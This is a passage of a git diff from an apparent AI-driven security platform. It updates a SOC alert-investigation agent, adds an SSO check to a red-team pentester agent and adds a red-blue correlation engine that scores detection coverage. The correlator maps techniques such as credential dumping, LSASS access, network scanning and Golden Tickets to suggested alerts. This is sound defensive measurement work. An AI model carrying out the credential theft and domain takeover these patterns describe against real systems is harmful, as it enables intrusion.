+ alert_time = datetime.fromisoformat(starts_at.replace("Z", "+00:00"))
+ else:
+ alert_time = datetime.now(timezone.utc)
+ except ValueError:
+ alert_time = datetime.now(timezone.utc)
+
+ alert_name = labels.get("alertname", "Unknown Alert")
+ severity = labels.get("severity", "unknown")
+ summary = annotations.get("summary", annotations.get("description", ""))
+
+ description = f"{severity.upper()} alert triggered: {alert_name}"
+ if summary:
+ description += f" - {summary[:100]}"
+
+ mitre_techniques = []
+ for key in ["mitre_technique", "mitre", "technique_id"]:
if labels.get(key):
- state.identified_techniques.add(labels[key])
- logger.info(f"Auto-recorded MITRE technique from alert: {labels[key]}")
+ mitre_techniques.append(labels[key])
break
if annotations.get(key):
- state.identified_techniques.add(annotations[key])
- logger.info(f"Auto-recorded MITRE technique from alert: {annotations[key]}")
+ mitre_techniques.append(annotations[key])
break
- initial_prompt = build_initial_prompt(alert)
-
- with dn.run(tags=["soc-investigation", alert_name]):
- dn.log_params(
- model=self.model,
- investigation_id=investigation_id,
- alert_name=alert_name,
- alert_severity=alert.get("labels", {}).get("severity", "unknown"),
- max_steps=self.max_steps,
- mcp_tools_available=self._mcp_tools is not None,
- mcp_tool_count=len(self._mcp_tools) if self._mcp_tools else 0,
- )
- dn.log_input("alert", alert)
-
- agent = create_investigation_agent(
- model=self.model,
- grafana_url=self.grafana_url,
- grafana_api_key=self.grafana_api_key,
- mitre_client=self.mitre_client,
- state=state,
- grafana_mcp_tools=self._mcp_tools,
- max_steps=self.max_steps,
- )
-
- # Run the investigation with timeout
- try:
- import asyncio
+ event = TimelineEvent(
+ id="tl-alert-0000",
+ timestamp=alert_time,
+ description=description,
+ evidence_ids=[],
+ mitre_techniques=mitre_techniques,
+ confidence=0.9,
+ source="alert",
+ )
- logger.info(f"Starting agent.run() with max_steps={self.max_steps}")
+ state.timeline.append(event)
+ logger.info(f"Created initial timeline event from alert: {description[:50]}...")
- # Add a generous timeout (5 minutes per step)
- timeout_seconds = self.max_steps * 300 # 5 minutes per step
+ def _generate_report(self, state: InvestigationState, _result) -> Path:
+ """Generate the markdown investigation report."""
+ from ares.reports.investigation import MarkdownReportGenerator
- result = await asyncio.wait_for(
- agent.run(initial_prompt),
- timeout=timeout_seconds,
- )
+ generator = MarkdownReportGenerator(self.report_dir)
+ return generator.generate(state)
- logger.success(f"Agent completed: {result.steps} steps, {result.stop_reason}")
+ def _persist_investigation(self, state: InvestigationState, status: str) -> None:
+ """Persist investigation results for learning.
- # Generate report
- report_path = self._generate_report(state, result)
+ Args:
+ state: Investigation state to persist
+ status: Final status (completed, escalated, timeout, failed)
+ """
+ try:
+ store = get_investigation_store()
- dn.log_output("report_path", str(report_path))
- dn.log_metric("investigation_success", 1)
+ # Create stored investigation from state
+ stored = create_stored_investigation_from_state(state, status)
- return {
- "investigation_id": investigation_id,
- "status": "completed" if not state.escalated else "escalated",
- "report_path": str(report_path),
- "evidence_count": len(state.evidence),
- "techniques_identified": list(state.identified_techniques),
- "highest_pyramid_level": state.highest_pyramid_level,
- }
+ # Store the investigation
+ store.store_investigation(stored)
- except asyncio.TimeoutError as timeout_err:
- logger.error(f"Investigation timed out after {timeout_seconds}s")
- logger.error(
- f"Current state: {len(state.evidence)} evidence items, {len(state.timeline)} timeline events"
- )
- dn.log_metric("investigation_timeout", 1)
- raise TimeoutError(
- f"Investigation exceeded {timeout_seconds}s timeout"
- ) from timeout_err
+ # Update query effectiveness statistics
+ alert_name = state.alert.get("labels", {}).get("alertname", "unknown")
+ for query in state.executed_queries:
+ query_str = query.get("query", "")
+ if query_str:
+ # Normalize query for pattern matching
+ pattern = self._normalize_query_pattern(query_str)
+ successful = query.get("result_count", 0) > 0
+ # Check if any evidence was recorded after this query
+ produced_evidence = len(state.evidence) > 0
- except Exception as e:
- logger.error(f"Investigation failed: {e}")
- dn.log_metric("investigation_failed", 1)
- raise
+ store.update_query_effectiveness(
+ query_pattern=pattern,
+ successful=successful,
+ produced_evidence=produced_evidence,
+ alert_type=alert_name,
+ )
- def _generate_report(self, state: InvestigationState, _result) -> Path:
- """Generate the markdown investigation report."""
- from ares.reports.investigation import MarkdownReportGenerator
+ logger.info(f"Persisted investigation {state.investigation_id} to store")
- generator = MarkdownReportGenerator(self.report_dir)
- return generator.generate(state)
+ except Exception as e:
+ # Don't fail the investigation if persistence fails
+ logger.warning(f"Failed to persist investigation: {e}")
+
+ def _normalize_query_pattern(self, query: str) -> str:
+ """Normalize a query string into a reusable pattern.
+
+ Replaces specific values with placeholders for pattern matching.
+
+ Args:
+ query: Raw query string
+
+ Returns:
+ Normalized pattern string
+ """
+ import re
+
+ pattern = query
+
+ # Replace timestamps with placeholder
+ pattern = re.sub(
+ r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?",
+ "",
+ pattern,
+ )
+
+ # Replace IP addresses with placeholder
+ pattern = re.sub(r"\d+\.\d+\.\d+\.\d+", "", pattern)
+
+ # Replace UUIDs with placeholder
+ pattern = re.sub(
+ r"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
+ "",
+ pattern,
+ flags=re.IGNORECASE,
+ )
+
+ # Replace specific hostnames (anything.domain.tld format)
+ return re.sub(
+ r"\b[a-z0-9-]+\.[a-z0-9-]+\.[a-z]{2,}\b",
+ "",
+ pattern,
+ flags=re.IGNORECASE,
+ )
diff --git a/src/ares/agents/red/pentester.py b/src/ares/agents/red/pentester.py
index d976f3f1..f72a5daf 100644
--- a/src/ares/agents/red/pentester.py
+++ b/src/ares/agents/red/pentester.py
@@ -12,6 +12,7 @@
from ares.core.factories.red_factory import create_redteam_agent
from ares.core.models import RedTeamState, Target
+from ares.core.remote import SSOTokenExpiredError, validate_sso_credentials
from ares.core.templates import get_template_loader
from ares.integrations.mitre import MITREAttackClient
from ares.reports.redteam import RedTeamReportGenerator
@@ -87,6 +88,14 @@ async def execute_operation(self, target_ip: str) -> dict:
logger.info(f"Starting red team operation {operation_id} against: {target_ip}")
+ # Validate SSO credentials before starting - fail fast if expired
+ try:
+ validate_sso_credentials()
+ logger.info("AWS SSO credentials validated successfully")
+ except SSOTokenExpiredError as e:
+ logger.error(f"Cannot start operation - {e}")
+ raise
+
# Create operation state
state = RedTeamState(
operation_id=operation_id,
diff --git a/src/ares/core/correlation.py b/src/ares/core/correlation.py
new file mode 100644
index 00000000..6c2e0358
--- /dev/null
+++ b/src/ares/core/correlation.py
@@ -0,0 +1,844 @@
+"""
+Red-Blue Correlation Engine.
+
+Correlates red team attack activities with blue team detections
+to measure detection coverage and identify gaps.
+"""
+
+import re
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+from typing import Any, ClassVar
+
+from loguru import logger
+
+
+@dataclass
+class RedTeamActivity:
+ """A single red team activity/action."""
+
+ timestamp: datetime
+ technique_id: str | None
+ technique_name: str | None
+ action: str
+ target_ip: str | None
+ target_host: str | None
+ credential_used: str | None
+ success: bool
+ metadata: dict[str, Any] = field(default_factory=dict)
+
+ @property
+ def key(self) -> str:
+ """Generate a unique key for this activity."""
+ return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.target_ip}"
+
+
+@dataclass
+class BlueTeamDetection:
+ """A blue team detection/alert."""
+
+ timestamp: datetime
+ alert_name: str
+ technique_id: str | None
+ severity: str
+ target_ip: str | None
+ target_host: str | None
+ investigation_id: str | None
+ status: str # completed, escalated, timeout
+ evidence_count: int
+ highest_pyramid_level: int
+ metadata: dict[str, Any] = field(default_factory=dict)
+
+ @property
+ def key(self) -> str:
+ """Generate a unique key for this detection."""
+ return f"{self.timestamp.isoformat()}:{self.technique_id}:{self.alert_name}"
+
+
+@dataclass
+class CorrelationMatch:
+ """A match between red team activity and blue team detection."""
+
+ red_activity: RedTeamActivity
+ blue_detection: BlueTeamDetection
+ time_delta_seconds: float
+ technique_match: bool
+ target_match: bool
+ confidence: float
+
+ @property
+ def match_quality(self) -> str:
+ """Assess the quality of this match."""
+ if self.technique_match and self.target_match and abs(self.time_delta_seconds) < 300:
+ return "STRONG"
+ if self.technique_match and abs(self.time_delta_seconds) < 600:
+ return "GOOD"
+ if self.technique_match or (self.target_match and abs(self.time_delta_seconds) < 300):
+ return "WEAK"
+ return "TENUOUS"
+
+
+@dataclass
+class DetectionGap:
+ """An undetected red team activity."""
+
+ red_activity: RedTeamActivity
+ reason: str
+ recommended_detection: str | None = None
+ mitre_data_sources: list[str] = field(default_factory=list)
+
+
+@dataclass
+class CorrelationReport:
+ """Full correlation analysis report."""
+
+ analysis_timestamp: datetime
+ red_operation_id: str
+ time_window_start: datetime
+ time_window_end: datetime
+
+ # Counts
+ total_red_activities: int
+ total_blue_detections: int
+ matched_activities: int
+ undetected_activities: int
+ false_positive_detections: int
+
+ # Details
+ matches: list[CorrelationMatch]
+ gaps: list[DetectionGap]
+ false_positives: list[BlueTeamDetection]
+
+ # Metrics
+ detection_rate: float
+ false_positive_rate: float
+ mean_time_to_detect: float | None # seconds
+
+ # By technique
+ technique_coverage: dict[str, dict[str, Any]]
+
+ def to_dict(self) -> dict[str, Any]:
+ """Convert report to dictionary."""
+ return {
+ "analysis_timestamp": self.analysis_timestamp.isoformat(),
+ "red_operation_id": self.red_operation_id,
+ "time_window": {
+ "start": self.time_window_start.isoformat(),
+ "end": self.time_window_end.isoformat(),
+ },
+ "summary": {
+ "total_red_activities": self.total_red_activities,
+ "total_blue_detections": self.total_blue_detections,
+ "matched_activities": self.matched_activities,
+ "undetected_activities": self.undetected_activities,
+ "false_positive_detections": self.false_positive_detections,
+ "detection_rate": f"{self.detection_rate * 100:.1f}%",
+ "false_positive_rate": f"{self.false_positive_rate * 100:.1f}%",
+ "mean_time_to_detect": f"{self.mean_time_to_detect:.1f}s"
+ if self.mean_time_to_detect
+ else "N/A",
+ },
+ "technique_coverage": self.technique_coverage,
+ "matches": [
+ {
+ "red_technique": m.red_activity.technique_id,
+ "red_action": m.red_activity.action[:100],
+ "blue_alert": m.blue_detection.alert_name,
+ "time_delta_seconds": m.time_delta_seconds,
+ "match_quality": m.match_quality,
+ "confidence": m.confidence,
+ }
+ for m in self.matches
+ ],
+ "gaps": [
+ {
+ "technique": g.red_activity.technique_id,
+ "action": g.red_activity.action[:100],
+ "timestamp": g.red_activity.timestamp.isoformat(),
+ "reason": g.reason,
+ "recommended_detection": g.recommended_detection,
+ }
+ for g in self.gaps
+ ],
+ "false_positives": [
+ {
+ "alert_name": fp.alert_name,
+ "technique": fp.technique_id,
+ "timestamp": fp.timestamp.isoformat(),
+ }
+ for fp in self.false_positives
+ ],
+ }
+
+
+class RedBlueCorrelator:
+ """Correlates red team activities with blue team detections.
+
+ This engine:
+ 1. Parses red team operation reports
+ 2. Parses blue team investigation reports
+ 3. Matches activities based on time, technique, and target
+ 4. Identifies detection gaps
+ 5. Calculates coverage metrics
+ """
+
+ # Time window for matching (activities within this window are considered related)
+ DEFAULT_TIME_WINDOW_MINUTES = 30
+
+ TECHNIQUE_PATTERNS: ClassVar[list[str]] = [
+ r"T\d{4}(?:\.\d{3})?", # T1234 or T1234.001
+ ]
+
+ def __init__(
+ self,
+ reports_dir: Path,
+ time_window_minutes: int = DEFAULT_TIME_WINDOW_MINUTES,
+ ):
+ """Initialize the correlator.
+
+ Args:
+ reports_dir: Directory containing red team and investigation reports
+ time_window_minutes: Time window for matching activities
+ """
+ self.reports_dir = Path(reports_dir)
+ self.time_window = timedelta(minutes=time_window_minutes)
+
+ def load_red_team_report(self, report_path: Path) -> tuple[str, list[RedTeamActivity]]:
+ """Load and parse a red team report.
+
+ Args:
+ report_path: Path to the red team report markdown file
+
+ Returns:
+ Tuple of (operation_id, list of activities)
+ """
+ content = report_path.read_text()
+ activities = []
+
+ # Extract operation ID
+ operation_id_match = re.search(r"\*\*Operation ID\*\*:\s*(\S+)", content)
+ operation_id = operation_id_match.group(1) if operation_id_match else "unknown"
+
+ # Extract target IP
+ target_ip_match = re.search(r"\*\*Target\*\*:\s*(\d+\.\d+\.\d+\.\d+)", content)
+ target_ip = target_ip_match.group(1) if target_ip_match else None
+
+ # Extract start time
+ started_match = re.search(r"\*\*Started\*\*:\s*(.+?)(?:\n|$)", content)
+ if started_match:
+ try:
+ started_at = datetime.strptime(
+ started_match.group(1).strip(), "%Y-%m-%d %H:%M:%S UTC"
+ ).replace(tzinfo=timezone.utc)
+ except ValueError:
+ started_at = datetime.now(timezone.utc)
+ else:
+ started_at = datetime.now(timezone.utc)
+
+ # Extract hosts discovered
+ hosts_section = re.search(r"### Hosts \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL)
+ if hosts_section:
+ host_count = int(hosts_section.group(1))
+ if host_count > 0:
+ activities.append(
+ RedTeamActivity(
+ timestamp=started_at,
+ technique_id="T1046", # Network Service Discovery
+ technique_name="Network Service Discovery",
+ action=f"Discovered {host_count} host(s) via network scanning",
+ target_ip=target_ip,
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ )
+
+ # Extract credentials obtained
+ creds_section = re.search(r"### Credentials \((\d+)\)(.*?)(?=###|\Z)", content, re.DOTALL)
+ if creds_section:
+ creds_content = creds_section.group(2)
+
+ cred_matches = re.findall(
+ r"\*\*(\S+)\*\*\s*\n.*?Source:\s*(.+?)(?:\n|$)", creds_content
+ )
+ for username, source in cred_matches:
+ activities.append(
+ RedTeamActivity(
+ timestamp=started_at + timedelta(minutes=1), # Slightly after start
+ technique_id="T1110" if "guessing" in source.lower() else "T1003",
+ technique_name="Credential Guessing"
+ if "guessing" in source.lower()
+ else "Credential Dumping",
+ action=f"Obtained credential for {username} via {source}",
+ target_ip=target_ip,
+ target_host=None,
+ credential_used=None,
+ success=True,
+ metadata={"username": username, "source": source},
+ )
+ )
+
+ # Extract MITRE techniques from timeline
+ timeline_section = re.search(
+ r"### Timeline of Key Events(.*?)(?=---|\Z)", content, re.DOTALL
+ )
+ if timeline_section:
+ timeline_content = timeline_section.group(1)
+ event_matches = re.findall(
+ r"\|\s*([^|]+)\s*\|\s*([^|]+)\s*\|\s*(T\d{4}(?:\.\d{3})?)\s*\|", timeline_content
+ )
+ for timestamp_str, description, technique_id in event_matches:
+ try:
+ event_time = datetime.fromisoformat(
+ timestamp_str.strip().replace("Z", "+00:00")
+ )
+ except ValueError:
+ event_time = started_at
+ activities.append(
+ RedTeamActivity(
+ timestamp=event_time,
+ technique_id=technique_id.strip(),
+ technique_name=None,
+ action=description.strip(),
+ target_ip=target_ip,
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ )
+
+ # Check for domain admin / golden ticket
+ if "Domain Admin Access**: ✓" in content or "has_domain_admin: true" in content.lower():
+ activities.append(
+ RedTeamActivity(
+ timestamp=started_at + timedelta(minutes=5),
+ technique_id="T1078.002",
+ technique_name="Valid Accounts: Domain Accounts",
+ action="Achieved Domain Admin access",
+ target_ip=target_ip,
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ )
+
+ if "Golden Ticket**: ✓" in content or "has_golden_ticket: true" in content.lower():
+ activities.append(
+ RedTeamActivity(
+ timestamp=started_at + timedelta(minutes=6),
+ technique_id="T1558.001",
+ technique_name="Golden Ticket",
+ action="Generated Golden Ticket for persistence",
+ target_ip=target_ip,
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ )
+
+ logger.info(f"Loaded {len(activities)} activities from red team report {operation_id}")
+ return operation_id, activities
+
+ def load_investigation_report(self, report_path: Path) -> BlueTeamDetection | None:
+ """Load and parse a blue team investigation report.
+
+ Args:
+ report_path: Path to the investigation report markdown file
+
+ Returns:
+ BlueTeamDetection object or None if parsing fails
+ """
+ content = report_path.read_text()
+
+ # Skip DatasourceNoData reports
+ if "DatasourceNoData" in report_path.name:
+ return None
+
+ # Extract investigation ID
+ inv_id_match = re.search(r"\*\*Investigation ID:\*\*\s*`?(\S+?)`?(?:\n|$)", content)
+ investigation_id = inv_id_match.group(1) if inv_id_match else None
+
+ # Extract alert name
+ alert_match = re.search(r"\|\s*Alert Name\s*\|\s*(.+?)\s*\|", content)
+ alert_name = alert_match.group(1).strip() if alert_match else "Unknown"
+
+ # Extract severity
+ severity_match = re.search(r"\|\s*Severity\s*\|\s*(\w+)\s*\|", content)
+ severity = severity_match.group(1).strip() if severity_match else "unknown"
+
+ # Extract timestamp from alert payload
+ starts_at_match = re.search(r'"startsAt":\s*"([^"]+)"', content)
+ if starts_at_match:
+ try:
+ timestamp = datetime.fromisoformat(starts_at_match.group(1).replace("Z", "+00:00"))
+ except ValueError:
+ timestamp = datetime.now(timezone.utc)
+ else:
+ # Try to extract from filename
+ date_match = re.search(r"(\d{8}_\d{6})", report_path.name)
+ if date_match:
+ try:
+ timestamp = datetime.strptime(date_match.group(1), "%Y%m%d_%H%M%S").replace(
+ tzinfo=timezone.utc
+ )
+ except ValueError:
+ timestamp = datetime.now(timezone.utc)
+ else:
+ timestamp = datetime.now(timezone.utc)
+
+ # Extract MITRE technique
+ technique_match = re.search(r"(T\d{4}(?:\.\d{3})?)", content)
+ technique_id = technique_match.group(1) if technique_match else None
+
+ # Extract status
+ status_match = re.search(r"\|\s*Status\s*\|\s*(\w+)", content)
+ status = status_match.group(1).strip().lower() if status_match else "unknown"
+
+ # Extract evidence count
+ evidence_match = re.search(r"\*\*Evidence Collected:\*\*\s*(\d+)", content)
+ evidence_count = int(evidence_match.group(1)) if evidence_match else 0
+
+ # Extract pyramid level
+ pyramid_match = re.search(r"\*\*Highest Pyramid Level:\*\*\s*(\d+)", content)
+ highest_pyramid_level = int(pyramid_match.group(1)) if pyramid_match else 0
+
+ # Extract target IP from content
+ ip_match = re.search(r"(\d+\.\d+\.\d+\.\d+)", content)
+ target_ip = ip_match.group(1) if ip_match else None
+
+ return BlueTeamDetection(
+ timestamp=timestamp,
+ alert_name=alert_name,
+ technique_id=technique_id,
+ severity=severity,
+ target_ip=target_ip,
+ target_host=None,
+ investigation_id=investigation_id,
+ status=status,
+ evidence_count=evidence_count,
+ highest_pyramid_level=highest_pyramid_level,
+ )
+
+ def load_all_reports(
+ self,
+ ) -> tuple[list[tuple[str, list[RedTeamActivity]]], list[BlueTeamDetection]]:
+ """Load all reports from the reports directory.
+
+ Returns:
+ Tuple of (list of (operation_id, activities), list of detections)
+ """
+ red_team_reports = []
+ blue_team_detections = []
+
+ for report_file in self.reports_dir.glob("*.md"):
+ if report_file.name.startswith("redteam-"):
+ try:
+ operation_id, activities = self.load_red_team_report(report_file)
+ red_team_reports.append((operation_id, activities))
+ except Exception as e:
+ logger.warning(f"Failed to parse red team report {report_file}: {e}")
+
+ elif report_file.name.startswith("investigation_"):
+ try:
+ detection = self.load_investigation_report(report_file)
+ if detection:
+ blue_team_detections.append(detection)
+ except Exception as e:
+ logger.warning(f"Failed to parse investigation report {report_file}: {e}")
+
+ logger.info(
+ f"Loaded {len(red_team_reports)} red team reports, "
+ f"{len(blue_team_detections)} investigation reports"
+ )
+ return red_team_reports, blue_team_detections
+
+ def correlate( # noqa: PLR0912
+ self,
+ red_activities: list[RedTeamActivity],
+ blue_detections: list[BlueTeamDetection],
+ operation_id: str = "unknown",
+ ) -> CorrelationReport:
+ """Correlate red team activities with blue team detections.
+
+ Args:
+ red_activities: List of red team activities
+ blue_detections: List of blue team detections
+ operation_id: Red team operation ID
+
+ Returns:
+ CorrelationReport with analysis results
+ """
+ matches: list[CorrelationMatch] = []
+ matched_red_keys: set[str] = set()
+ matched_blue_keys: set[str] = set()
+
+ red_activities = sorted(red_activities, key=lambda x: x.timestamp)
+ blue_detections = sorted(blue_detections, key=lambda x: x.timestamp)
+
+ if red_activities:
+ time_window_start = min(a.timestamp for a in red_activities) - self.time_window
+ time_window_end = max(a.timestamp for a in red_activities) + self.time_window
+ else:
+ time_window_start = datetime.now(timezone.utc) - timedelta(hours=1)
+ time_window_end = datetime.now(timezone.utc)
+
+ # Match activities to detections
+ for red_activity in red_activities:
+ best_match: CorrelationMatch | None = None
+ best_confidence = 0.0
+
+ for detection in blue_detections:
+ time_delta = (detection.timestamp - red_activity.timestamp).total_seconds()
+
+ if abs(time_delta) > self.time_window.total_seconds():
+ continue
+
+ technique_match = (
+ red_activity.technique_id is not None
+ and detection.technique_id is not None
+ and red_activity.technique_id == detection.technique_id
+ )
+
+ target_match = (
+ red_activity.target_ip is not None
+ and detection.target_ip is not None
+ and red_activity.target_ip == detection.target_ip
+ )
+
+ confidence = 0.0
+ if technique_match:
+ confidence += 0.5
+ if target_match:
+ confidence += 0.3
+ # Time proximity bonus (closer = higher confidence)
+ time_bonus = max(0, 1 - abs(time_delta) / self.time_window.total_seconds()) * 0.2
+ confidence += time_bonus
+
+ if confidence > best_confidence:
+ best_confidence = confidence
+ best_match = CorrelationMatch(
+ red_activity=red_activity,
+ blue_detection=detection,
+ time_delta_seconds=time_delta,
+ technique_match=technique_match,
+ target_match=target_match,
+ confidence=confidence,
+ )
+
+ if best_match and best_match.confidence >= 0.3:
+ matches.append(best_match)
+ matched_red_keys.add(red_activity.key)
+ matched_blue_keys.add(best_match.blue_detection.key)
+
+ # Identify detection gaps (undetected red activities)
+ gaps: list[DetectionGap] = []
+ for activity in red_activities:
+ if activity.key not in matched_red_keys:
+ gap = DetectionGap(
+ red_activity=activity,
+ reason=self._determine_gap_reason(activity, blue_detections),
+ recommended_detection=self._recommend_detection(activity),
+ )
+ gaps.append(gap)
+
+ # Identify false positives (detections without matching red activity)
+ false_positives: list[BlueTeamDetection] = []
+ for detection in blue_detections:
+ if (
+ detection.key not in matched_blue_keys
+ and time_window_start <= detection.timestamp <= time_window_end
+ ):
+ false_positives.append(detection)
+
+ total_red = len(red_activities)
+ matched_count = len(matches)
+ detection_rate = matched_count / total_red if total_red > 0 else 0.0
+
+ detections_in_window = len(
+ [d for d in blue_detections if time_window_start <= d.timestamp <= time_window_end]
+ )
+ false_positive_rate = (
+ len(false_positives) / detections_in_window if detections_in_window > 0 else 0.0
+ )
+
+ time_deltas = [abs(m.time_delta_seconds) for m in matches if m.time_delta_seconds >= 0]
+ mean_ttd = sum(time_deltas) / len(time_deltas) if time_deltas else None
+
+ technique_coverage = self._calculate_technique_coverage(red_activities, matches, gaps)
+
+ return CorrelationReport(
+ analysis_timestamp=datetime.now(timezone.utc),
+ red_operation_id=operation_id,
+ time_window_start=time_window_start,
+ time_window_end=time_window_end,
+ total_red_activities=total_red,
+ total_blue_detections=len(blue_detections),
+ matched_activities=matched_count,
+ undetected_activities=len(gaps),
+ false_positive_detections=len(false_positives),
+ matches=matches,
+ gaps=gaps,
+ false_positives=false_positives,
+ detection_rate=detection_rate,
+ false_positive_rate=false_positive_rate,
+ mean_time_to_detect=mean_ttd,
+ technique_coverage=technique_coverage,
+ )
+
+ def _determine_gap_reason(
+ self,
+ activity: RedTeamActivity,
+ detections: list[BlueTeamDetection],
+ ) -> str:
+ """Determine why an activity was not detected."""
+ if not activity.technique_id:
+ return "Activity has no associated MITRE technique"
+
+ technique_alerts = [d for d in detections if d.technique_id == activity.technique_id]
+ if not technique_alerts:
+ return f"No alert rules configured for technique {activity.technique_id}"
+
+ return "Alert exists but did not trigger within time window (possible log ingestion delay or query timeout)"
+
+ def _recommend_detection(self, activity: RedTeamActivity) -> str | None:
+ """Recommend a detection for an undetected activity."""
+ technique_recommendations = {
+ "T1046": "Add alert for network scanning patterns (nmap, masscan)",
+ "T1110": "Add alert for multiple failed authentication attempts",
+ "T1003": "Add alert for LSASS access or credential dumping tools",
+ "T1078.002": "Add alert for new domain admin group membership",
+ "T1558.001": "Add alert for krbtgt service ticket requests with RC4",
+ "T1021.002": "Add alert for remote SMB connections from unusual sources",
+ }
+ if activity.technique_id:
+ return technique_recommendations.get(activity.technique_id)
+ return None
+
+ def _calculate_technique_coverage(
+ self,
+ activities: list[RedTeamActivity],
+ matches: list[CorrelationMatch],
+ gaps: list[DetectionGap],
+ ) -> dict[str, dict[str, Any]]:
+ """Calculate detection coverage per technique."""
+ coverage: dict[str, dict[str, Any]] = {}
+
+ for activity in activities:
+ if activity.technique_id:
+ if activity.technique_id not in coverage:
+ coverage[activity.technique_id] = {
+ "total": 0,
+ "detected": 0,
+ "missed": 0,
+ "detection_rate": 0.0,
+ }
+ coverage[activity.technique_id]["total"] += 1
+
+ for match in matches:
+ if match.red_activity.technique_id:
+ coverage[match.red_activity.technique_id]["detected"] += 1
+
+ for gap in gaps:
+ if gap.red_activity.technique_id:
+ coverage[gap.red_activity.technique_id]["missed"] += 1
+
+ for data in coverage.values():
+ if data["total"] > 0:
+ data["detection_rate"] = data["detected"] / data["total"]
+
+ return coverage
+
+ def generate_report_markdown(self, report: CorrelationReport) -> str: # noqa: PLR0912
+ """Generate a markdown report from correlation results.
+
+ Args:
+ report: CorrelationReport object
+
+ Returns:
+ Markdown formatted report string
+ """
+ lines = [
+ "# Red-Blue Correlation Report",
+ "",
+ f"**Analysis Time:** {report.analysis_timestamp.strftime('%Y-%m-%d %H:%M:%S UTC')}",
+ f"**Red Team Operation:** {report.red_operation_id}",
+ f"**Time Window:** {report.time_window_start.strftime('%Y-%m-%d %H:%M')} to {report.time_window_end.strftime('%Y-%m-%d %H:%M')}",
+ "",
+ "---",
+ "",
+ "## Executive Summary",
+ "",
+ "| Metric | Value |",
+ "|--------|-------|",
+ f"| Red Team Activities | {report.total_red_activities} |",
+ f"| Blue Team Detections | {report.total_blue_detections} |",
+ f"| Matched (Detected) | {report.matched_activities} |",
+ f"| Detection Gaps | {report.undetected_activities} |",
+ f"| False Positives | {report.false_positive_detections} |",
+ f"| **Detection Rate** | **{report.detection_rate * 100:.1f}%** |",
+ f"| False Positive Rate | {report.false_positive_rate * 100:.1f}% |",
+ f"| Mean Time to Detect | {f'{report.mean_time_to_detect:.0f}s' if report.mean_time_to_detect else 'N/A'} |",
+ "",
+ ]
+
+ # Detection rate assessment
+ if report.detection_rate >= 0.8:
+ assessment = "EXCELLENT - Blue team is detecting most red team activities"
+ elif report.detection_rate >= 0.6:
+ assessment = "GOOD - Majority of activities detected, some gaps remain"
+ elif report.detection_rate >= 0.4:
+ assessment = "MODERATE - Significant detection gaps exist"
+ else:
+ assessment = "POOR - Most red team activities went undetected"
+
+ lines.extend(
+ [
+ f"### Assessment: {assessment}",
+ "",
+ "---",
+ "",
+ ]
+ )
+
+ # Technique coverage
+ if report.technique_coverage:
+ lines.extend(
+ [
+ "## Technique Coverage",
+ "",
+ "| Technique | Total | Detected | Missed | Rate |",
+ "|-----------|-------|----------|--------|------|",
+ ]
+ )
+ for tech_id, data in sorted(report.technique_coverage.items()):
+ rate_str = f"{data['detection_rate'] * 100:.0f}%"
+ rate_emoji = (
+ "✅"
+ if data["detection_rate"] >= 0.8
+ else "⚠️"
+ if data["detection_rate"] >= 0.5
+ else "❌"
+ )
+ lines.append(
+ f"| {tech_id} | {data['total']} | {data['detected']} | {data['missed']} | {rate_emoji} {rate_str} |"
+ )
+ lines.extend(["", "---", ""])
+
+ # Successful detections
+ if report.matches:
+ lines.extend(
+ [
+ "## Successful Detections",
+ "",
+ "| Red Activity | Blue Alert | Time Delta | Quality |",
+ "|--------------|------------|------------|---------|",
+ ]
+ )
+ for match in report.matches[:20]: # Limit to 20
+ lines.append(
+ f"| {match.red_activity.technique_id or 'N/A'}: {match.red_activity.action[:40]}... | "
+ f"{match.blue_detection.alert_name[:30]}... | "
+ f"{match.time_delta_seconds:.0f}s | "
+ f"{match.match_quality} |"
+ )
+ lines.extend(["", "---", ""])
+
+ # Detection gaps
+ if report.gaps:
+ lines.extend(
+ [
+ "## Detection Gaps (Undetected Activities)",
+ "",
+ "| Technique | Activity | Reason | Recommendation |",
+ "|-----------|----------|--------|----------------|",
+ ]
+ )
+ for gap in report.gaps[:20]: # Limit to 20
+ lines.append(
+ f"| {gap.red_activity.technique_id or 'N/A'} | "
+ f"{gap.red_activity.action[:40]}... | "
+ f"{gap.reason[:40]}... | "
+ f"{gap.recommended_detection or 'N/A'} |"
+ )
+ lines.extend(["", "---", ""])
+
+ # False positives
+ if report.false_positives:
+ lines.extend(
+ [
+ "## False Positives (Detections without Red Activity)",
+ "",
+ "| Alert | Technique | Time |",
+ "|-------|-----------|------|",
+ ]
+ )
+ for fp in report.false_positives[:10]: # Limit to 10
+ lines.append(
+ f"| {fp.alert_name[:40]}... | {fp.technique_id or 'N/A'} | {fp.timestamp.strftime('%H:%M:%S')} |"
+ )
+ lines.extend(["", "---", ""])
+
+ # Recommendations
+ lines.extend(
+ [
+ "## Recommendations",
+ "",
+ ]
+ )
+
+ if report.gaps:
+ # Group recommendations by technique
+ recommendations = {}
+ for gap in report.gaps:
+ if gap.recommended_detection:
+ tech = gap.red_activity.technique_id or "General"
+ if tech not in recommendations:
+ recommendations[tech] = gap.recommended_detection
+
+ for i, (tech, rec) in enumerate(recommendations.items(), 1):
+ lines.append(f"{i}. **{tech}**: {rec}")
+
+ if report.detection_rate < 0.8:
+ lines.extend(
+ [
+ "",
+ "### General Improvements",
+ "- Review query timeout issues in Loki/Grafana",
+ "- Ensure log ingestion latency is < 60 seconds",
+ "- Add missing detection rules for uncovered techniques",
+ "- Consider increasing alert rule evaluation frequency",
+ ]
+ )
+
+ lines.extend(
+ [
+ "",
+ "---",
+ "",
+ "*Report generated by Ares Red-Blue Correlation Engine*",
+ ]
+ )
+
+ return "\n".join(lines)
+
+ def run_full_analysis(self) -> list[CorrelationReport]:
+ """Run correlation analysis on all reports in the directory.
+
+ Returns:
+ List of CorrelationReport objects, one per red team operation
+ """
+ red_reports, blue_detections = self.load_all_reports()
+
+ reports = []
+ for operation_id, activities in red_reports:
+ report = self.correlate(activities, blue_detections, operation_id)
+ reports.append(report)
+
+ # Generate and save markdown report
